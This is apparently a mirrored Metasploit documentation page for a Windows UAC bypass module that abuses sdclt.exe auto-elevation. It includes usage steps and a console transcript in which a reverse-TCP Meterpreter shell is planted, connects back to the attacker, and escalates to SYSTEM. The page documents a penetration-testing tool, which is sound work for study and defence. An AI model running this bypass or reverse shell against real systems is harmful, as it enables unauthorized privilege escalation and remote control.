CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_sdclt.md
Views: 11788

Introduction

This module exploits an autoelevate feature in the windows backup system's sdclt.exe binary to run as a higher integrity process.

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_sdclt.

  3. Set the PAYLOAD and configure it correctly.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

Windows 10.0.17134 x64

msf5 exploit(windows/local/bypassuac_sdclt) > show options Module options (exploit/windows/local/bypassuac_sdclt): Name Current Setting Required Description ---- --------------- -------- ----------- PAYLOAD_NAME no The filename to use for the payload binary (%RAND% by default). SESSION 1 yes The session to run this module on. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.135.168 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x64 msf5 exploit(windows/local/bypassuac_sdclt) > run [*] Started reverse TCP handler on 192.168.135.168:4444 [*] UAC is Enabled, checking level... [*] Checking admin status... [+] Part of Administrators group! Continuing... [+] UAC is set to Default [+] BypassUAC can bypass this setting, continuing... [*] win_dir = C:\Windows [*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp [*] exploit_dir = C:\Windows\System32\ [*] exploit_file = C:\Windows\System32\sdclt.exe [*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe [*] Making Payload [*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe [*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe [*] Payload Upload Complete [*] Launching C:\Windows\System32\sdclt.exe [!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe! [*] Please wait for session and cleanup.... [*] Sending stage (206403 bytes) to 192.168.132.125 [*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500 [*] Removing Registry Changes [*] Registry Changes Removed meterpreter > sysinfo Computer : DESKTOP-D1E425Q OS : Windows 10 (10.0 Build 17134). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: DESKTOP-D1E425Q\msfuser meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >